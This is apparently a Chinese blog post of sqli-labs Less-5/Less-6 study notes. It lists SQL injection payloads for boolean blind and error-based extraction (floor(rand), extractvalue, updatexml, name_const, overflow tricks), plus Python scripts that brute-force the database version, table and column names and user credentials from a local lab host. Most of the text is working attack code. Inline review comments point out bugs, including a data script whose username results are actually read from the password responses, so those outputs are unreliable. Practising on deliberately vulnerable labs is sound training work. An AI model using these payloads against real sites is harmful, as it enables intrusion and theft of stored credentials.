之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象
Sqli-labs 博客目录
盲注用到的函数
rand() 产生一个不固定的0~1的随机数列,加了参数之后会变成固定的伪随机数列
rand(0),rand(1),当使用一个整数参数时,rand使用该参数作为种子生成一个固定的伪随机数列
floor 向下取整 floor(2.5) == 2
count()统计元组的个数
concat 字符串连接
extractvalue(最长32位)
updateXml(最长32位)
Less-5 使用脚本爆破注入
Less-6 使用 floor(rand(x)*2) 报错注入
下面以 Less-6(基于报错的sql盲注-双引号)为例进行列举
布尔型盲注手法,按位爆破
?id=1'and left((select version() limit 0,1),1)='s'#
利用 floor(rand(x)*2) 的执行bug进行报错注入
?id=1" union select 1,count(*),concat((你希望的查询语句),floor(rand(0)*2))a from information_schema.columns group by a#
?id=1" and (select 1 from(select count(*),concat((你希望的查询语句),floor(rand(0)*2))x from information_schema.tables group by x)a)#
利用 extractvalue() 函数报错注入(有长度限制,最长32位,mysql 5.0不可用,mysql 5.6可用)
?id=1" and extractvalue(1,concat(0x7e,(你希望的查询语句)))#
?id=1" and extractvalue(1,concat(0x7e,((select * from(select concat((你希望的查询语句))x from information_schema.tables group by x)a))))#
?id=1" and extractvalue(1,concat(0x7e,(database())))#
?id=1" and extractvalue(1,concat(0x7e,((select * from(select concat((select username from security.users limit 0,1))x from information_schema.tables group by x)a))))#
利用 updatexml() 函数报错注入(有长度限制,最长32位)
?id=1" and updatexml(1,concat(0x7e,(你希望的查询语句),0x7e),1)#
利用 name_const 数据的重复性(低版本可用,mysql 5.0可用,mysql 5.6不可用)
?id=1" union select 1,2,3 from (select name_const((你希望的查询语句),1),name_const((你希望的查询语句),1))x #
?id=1" and exists(select * from (select * from(select name_const((你希望的查询语句),0))a join(select name_const((你希望的查询语句),0))b)c)#
利用 double 数值类型超出范围进行报错注入
?id=1" union select (exp(~(select * from(select user())a))),2,3#
未测试成功
利用 bigint 溢出进行报错注入(此类溢出报错出现在 MySQL 5.5.5 及以上版本)
基于 bigint 溢出错误的SQL注入( https://www.cnblogs.com/lcamry/articles/5509112.html)
未测试成功
?id=1" union select (!(select * from (select user())x) - ~0),2,3#
下面为句式:
!(select*from(select user())x)-~0
(select(!x-~0)from(select(select user())x)a)
(select!x-~0.from(select(select user())x)a)
select ~0+!(select*from(select user())x)
一个句式组合:
(select * from(select concat((你希望的查询语句))x from information_schema.tables group by x)a)
遇到无法使用 select * from * 查询的时候,可以使用这个万能句式,代替下面的“你希望的查询语句”
?id=1" and (select 1 from(select count(*),concat((你希望的查询语句),floor(rand(0)*2))x from information_schema.tables group by x)a)#
?id=1" and extractvalue(1,concat(0x7e,(你希望的查询语句)))#
?id=1" and updatexml(1,concat(0x7e,(你希望的查询语句),0x7e),1)#
?id=1" and exists(select * from (select * from(select name_const((你希望的查询语句),0))a join(select name_const((你希望的查询语句),0))b)c)#
?id=1" union select 1,2,3 from (select name_const((你希望的查询语句),1),name_const((你希望的查询语句),1))x #
?id=1" union select (exp(~(select * from(select user())a))),2,3#
and so on...
测试
?id=1 正常
?id=1" 正常
?id=1' 报错
下面使用布尔的 SQL 盲注
猜数据库的版本
?id=1'and left(version(),1)=4--+
?id=1'and left(version(),1)=5--+
# 结果为 5.0.51a3ubuntu5
脚本运行
# -*- coding: utf-8 -*-
# filename:Less05-1 database_version.py
import hackhttp
import re
def database_version(arg):
    """Recover version() one character at a time with a boolean condition.

    For positions 1..19 and each candidate character, one request is sent
    whose id parameter appends ``and mid(version(),i,1)='c'`` to the base
    URL; a response body containing "You are in" is treated as "true".

    Args:
        arg: base URL ending in the injectable parameter (e.g. ``.../?id=``).

    Returns:
        None. Progress and the assembled string are printed.
    """
    print "database_version start test..."
    # Characters tried at each position. A position whose real character is
    # outside this set matches nothing and is silently skipped (nothing is
    # appended), so the printed result can be shorter than the true string.
    payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
    version=""
    # Fixed upper bound of 19 positions; a longer value is truncated.
    for i in range(1,20):
        for j in payloads:
            # hackhttp is a third-party client; the shape of its return
            # value is only known from the tuple unpacking below.
            hh = hackhttp.hackhttp()
            # %27 is a URL-encoded single quote.
            msg = "1%27and%20mid(version(),{i},1)=%27{j}%27--+".format(i=i,j=j)
            code, head, body, redirect_url, log = hh.http(arg+msg)
            # re.findall returns the literal matches, so the membership test
            # below is equivalent to a substring check on body.
            count = re.findall("You are in",body)
            if 'You are in' in count:
                version+=j
                print "第%s位是%s" % (i,j)
                break
    print "数据库的版本为: {version}".format(version=version)
if __name__ == '__main__':
    # Base URL of the local sqli-labs instance; the payload is appended
    # directly after "?id=".
    database_version('http://10.10.10.137/sqli-labs/Less-5/?id=')
猜数据库的长度
?id=1'and length(database())=7--+
?id=1'and length(database())=8--+
# 结果为 8
脚本运行
# -*- coding: utf-8 -*-
# filename:Less05-2 database_length.py
import hackhttp
import re
def database_length(arg):
    """Find length(database()) by testing the candidate values 1..19.

    One request is sent per candidate; the first response whose body contains
    "You are in" is taken as the answer and the loop stops.

    Args:
        arg: base URL ending in the injectable parameter (e.g. ``.../?id=``).

    Returns:
        None. The result is printed. If no candidate matches, ``length``
        stays the empty string and that is what is printed.
    """
    print "database_length start test..."
    length=""
    # Candidates 1..19 only; a longer name is never detected.
    for j in range(1,20):
        hh = hackhttp.hackhttp()
        # %27 is a URL-encoded single quote.
        msg = "1%27and%20length(database())={j}--+".format(j=j)
        code, head, body, redirect_url, log = hh.http(arg+msg)
        # findall returns literal matches; membership == substring check.
        count = re.findall("You are in",body)
        if 'You are in' in count:
            # Type changes here: length becomes an int on success.
            length=j
            break
    print "数据库的长度为: {length}".format(length=length)
if __name__ == '__main__':
    # Base URL of the local sqli-labs instance; the payload is appended
    # directly after "?id=".
    database_length('http://10.10.10.137/sqli-labs/Less-5/?id=')
猜数据库名
?id=1' and mid(database(),1,1)="a"--+
?id=1' and mid(database(),1,1)="b"--+
# 结果为 security
脚本运行
# -*- coding: utf-8 -*-
# filename:Less05-3 database_name.py
import hackhttp
import re
def database_name(arg):
    """Recover database() one character at a time with a boolean condition.

    Same loop structure as database_version: positions 1..19, each candidate
    character tested with ``mid(database(),i,1)='c'``; a body containing
    "You are in" counts as "true".

    Args:
        arg: base URL ending in the injectable parameter (e.g. ``.../?id=``).

    Returns:
        None. Progress and the assembled name are printed.
    """
    print "database_name start test..."
    # Characters tried per position; an unmatched position is skipped
    # without appending anything.
    payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
    name=""
    # Fixed upper bound of 19 positions.
    for i in range(1,20):
        for j in payloads:
            hh = hackhttp.hackhttp()
            # %27 is a URL-encoded single quote.
            msg = "1%27and%20mid(database(),{i},1)=%27{j}%27--+".format(i=i,j=j)
            code, head, body, redirect_url, log = hh.http(arg+msg)
            count = re.findall("You are in",body)
            if 'You are in' in count:
                name+=j
                print "第%s位是%s" % (i,j)
                break
    # NOTE(review): the label says "version" (版本) but this prints the
    # database name; copied from database_version.
    print "数据库的版本为: {name}".format(name=name)
if __name__ == '__main__':
    # Base URL of the local sqli-labs instance; the payload is appended
    # directly after "?id=".
    database_name('http://10.10.10.137/sqli-labs/Less-5/?id=')
猜表名
?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=80--+
?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),1,1))=81--+
?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=80--+
?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))=80--+
结果为 emails, users
运行脚本
# -*- coding: utf-8 -*-
# filename:Less05-4 table_name.py
import hackhttp
import re
def table_name(arg):
    """Recover table names of the ``security`` schema by ASCII code, per position.

    For each of the first 10 rows (``limit k,1``), each of positions 1..9, and
    each ASCII code 65..121, one request is sent; a body containing
    "You are in" accepts the code and moves to the next position. Names are
    separated by a single space in the printed result.

    Args:
        arg: base URL ending in the injectable parameter (e.g. ``.../?id=``).

    Returns:
        None. Progress and the assembled, space-separated names are printed.
    """
    print "table_name start test..."
    # Unused in this function (the candidates come from the ASCII range below).
    payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
    # Local shadows the enclosing function name inside the body; harmless
    # because the function does not call itself.
    table_name=""
    # Unused except for the commented-out line below.
    database_name=""
    # Only the first 10 rows are enumerated.
    for k in range(10):
        # Positions 1..9; a longer name is truncated.
        for i in range(1,10):
            # NOTE(review): range(65,122) stops at 121 ('y'); code 122 ('z')
            # is never tried, and codes below 65 (digits, '_') are skipped.
            for j in range(65,122):
                hh = hackhttp.hackhttp()
                # 0x7365637572697479 is the hex encoding of "security"
                # (see the table_schema examples above in the page).
                msg = "1%27and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479%20limit%20{k},1),{i},1))={j}--+".format(k=k,i=i,j=j)
                code, head, body, redirect_url, log = hh.http(arg+msg)
                count = re.findall("You are in",body)
                if 'You are in' in count:
                    table_name+=chr(j)
                    #database_name+=str(k+1)
                    print "第%s个表的第%s位的ASCII码值是%s" % (k+1,i,j)
                    break
        # Separator between consecutive table names.
        table_name+=" "
    print "security 数据库的表名为: {table_name}".format(table_name=table_name)
if __name__ == '__main__':
    # Base URL of the local sqli-labs instance; the payload is appended
    # directly after "?id=".
    table_name('http://10.10.10.137/sqli-labs/Less-5/?id=')
猜列名
?id=1'and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^pass' limit 0,1)--+
?id=1'and ascii(substr((select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1),1,1))>65--+
?id=1'and ascii(substr((select column_name from information_schema.columns where table_name=0x7573657273 limit 1,1),1,1))>65--+
结果为 id username password
执行脚本
# -*- coding: utf-8 -*-
# filename:Less05-5 column_name.py
import hackhttp
import re
def column_name(arg):
    """Recover column names of the ``users`` table by ASCII code, per position.

    For each of the first 10 rows (``limit k,1``), positions 1..14, and ASCII
    codes 65..121, one request is sent; a body containing "You are in"
    accepts the code and moves to the next position. Names are separated by
    a single space in the printed result.

    Args:
        arg: base URL ending in the injectable parameter (e.g. ``.../?id=``).

    Returns:
        None. Progress and the assembled, space-separated names are printed.
    """
    print "column_name start test..."
    # Unused in this function (the candidates come from the ASCII range below).
    payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
    # Local shadows the enclosing function name; harmless, no recursion.
    column_name=""
    # Only the first 10 columns are enumerated.
    for k in range(10):
        # Positions 1..14; a longer name is truncated.
        for i in range(1,15):
            # NOTE(review): range(65,122) excludes 122 ('z') and everything
            # below 65 (digits, '_'), so such characters are never found.
            for j in range(65,122):
                hh = hackhttp.hackhttp()
                # 0x7573657273 is the hex encoding of "users"; note the
                # query is not restricted by table_schema.
                msg = "1%27and%20ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name=0x7573657273%20limit%20{k},1),{i},1))={j}--+".format(k=k,i=i,j=j)
                code, head, body, redirect_url, log = hh.http(arg+msg)
                count = re.findall("You are in",body)
                if 'You are in' in count:
                    column_name+=chr(j)
                    print "第%s个列的第%s位的ASCII码值是%s" % (k+1,i,j)
                    break
        # Separator between consecutive column names.
        column_name+=" "
    print "security 数据库的 user 表的列名为: {column_name}".format(column_name=column_name)
if __name__ == '__main__':
    # Base URL of the local sqli-labs instance; the payload is appended
    # directly after "?id=".
    column_name('http://10.10.10.137/sqli-labs/Less-5/?id=')
猜数据
?id=1' and ord(mid((select ifnull(cast(username as char),0x20)from security.users order by id LIMIT 0,1),1,1))=68--+
?id=1'and ascii(substr((select username from security.users limit 0,1),1,1))=68--+
执行脚本
# -*- coding: utf-8 -*-
# filename:Less05-5 data.py
import hackhttp
import re
def data(arg):
    """Recover username and password values of ``security.users`` by ASCII code.

    For each of the first 14 rows, positions 1..14 and ASCII codes 48..121,
    two requests are sent (one for username, one for password). Matches are
    appended to the respective accumulator; rows are separated by a space.

    NOTE(review): the indentation of the published listing was lost; the
    structure below follows the sibling scripts (``break`` inside the
    password branch, separators appended once per row) — confirm against
    the original file.

    Args:
        arg: base URL ending in the injectable parameter (e.g. ``.../?id=``).

    Returns:
        None. Progress and both assembled strings are printed.
    """
    print "data start test..."
    # Unused in this function (the candidates come from the ASCII range below).
    payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
    username=""
    password=""
    # Only the first 14 rows are enumerated.
    for k in range(14):
        # Positions 1..14; a longer value is truncated.
        for i in range(1,15):
            # ASCII 48..121: digits, letters up to 'y'; 'z' (122) excluded.
            for j in range(48,122):
                hh = hackhttp.hackhttp()
                username_msg = "1%27and%20ascii(substr((select%20username%20from%20security.users%20%20limit%20{k},1),{i},1))={j}--+".format(k=k,i=i,j=j)
                password_msg = "1%27and%20ascii(substr((select%20password%20from%20security.users%20%20limit%20{k},1),{i},1))={j}--+".format(k=k,i=i,j=j)
                # NOTE(review): the first response is overwritten by the second
                # before it is inspected, so both checks below read the
                # password response; the username result is therefore not
                # derived from the username request.
                code, head, body, redirect_url, log = hh.http(arg+username_msg)
                code, head, body, redirect_url, log = hh.http(arg+password_msg)
                username_count = re.findall("You are in",body)
                password_count = re.findall("You are in",body)
                if 'You are in' in username_count:
                    username+=chr(j)
                    print "username第%s个数据的第%s位的ASCII码值是%s" % (k+1,i,j)
                if 'You are in' in password_count:
                    password+=chr(j)
                    print "password第%s个数据的第%s位的ASCII码值是%s" % (k+1,i,j)
                    break
        # Separators between consecutive rows.
        username+=" "
        password+=" "
    print "security 数据库的 user 表的username为: {username}".format(username=username)
    print "security 数据库的 user 表的password为: {password}".format(password=password)
if __name__ == '__main__':
    # Base URL of the local sqli-labs instance; the payload is appended
    # directly after "?id=".
    data('http://10.10.10.137/sqli-labs/Less-5/?id=')
floor(rand(x)*2) - SQL报错型盲注教程(原理全剖析( https://blog.csdn.net/qq_35544379/article/details/77453019 ))
牛人推论:对于一个整数x,对于floor(rand(x)*2)产生的序列,如果在未出现“0011”或“1100”序列前出现“0010”或“1101”,那么该floor(rand(x)*2)产生的序列可用于报错型sql盲注
测试
?id=1 正常
?id=1' 正常
?id=1" 报错
下面使用基于报错的 SQL 盲注
公式:
?id=1' union select 1,count(*),concat((你希望的查询语句),floor(rand(0)*2))a from information_schema.columns group by a--+
例如:
?id=1" union select 1,count(*),concat(database(),floor(rand(0)*2))a from information_schema.tables group by a--+
?id=1" union select 1,count(*),concat(@@version,floor(rand(0)*2))a from information_schema.tables group by a--+
?id=1" union select 1,count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 0,1),floor(rand(0)*2))a from information_schema.tables group by a--+
有的时候 union 联合查询无法使用,则可以使用 and
?id=1" and (select 1 from(select count(*),concat((你希望的查询语句),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
猜数据库
?id=1" and (select 1 from(select count(*),concat(table_schema,floor(rand(0)*2))x from information_schema.tables group by x)a)--+
?id=1" union select 1,count(*),concat(database(),floor(rand(0)*2))a from information_schema.tables group by a--+
查表的个数
?id=1" and (select 1 from(select count(*),concat((select count(table_name) from information_schema.tables where table_schema='security' limit 0,1),0x20,floor(rand(0)*2))x from information_schema.tables group by x)a)--+
?id=1" union select 1,count(*),concat((select count(table_name) from information_schema.tables where table_schema='security' limit 0,1),0x20,floor(rand(0)*2))a from information_schema.columns group by a--+
查表名
?id=1" and (select 1 from(select count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
?id=1" union select 1,count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 0,1),floor(rand(0)*2))a from information_schema.columns group by a--+
查列数
?id=1" and (select 1 from(select count(*),concat((select count(column_name) from information_schema.columns where table_name='users' and table_schema='security' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
?id=1" union select 1,count(*),concat((select count(column_name) from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),floor(rand(0)*2))a from information_schema.columns group by a--+
列名
?id=1" union select 1,count(*),concat((select column_name from information_schema.columns where table_name='users' and table_schema='security' limit 0,1),floor(rand(0)*2))a from information_schema.columns group by a--+
?id=1" union Select 1,count(*),concat((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),floor(rand(0)*2))a from information_schema.columns group by a--+
查数据
?id=1" and (select 1 from(select count(*),concat((select concat(username,0x3a,0x20,password) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
?id=1" union select 1,count(*),concat((select concat(username,0x3a,0x20,password) from security.users limit 0,1),floor(rand(0)*2))a from information_schema.tables group by a--+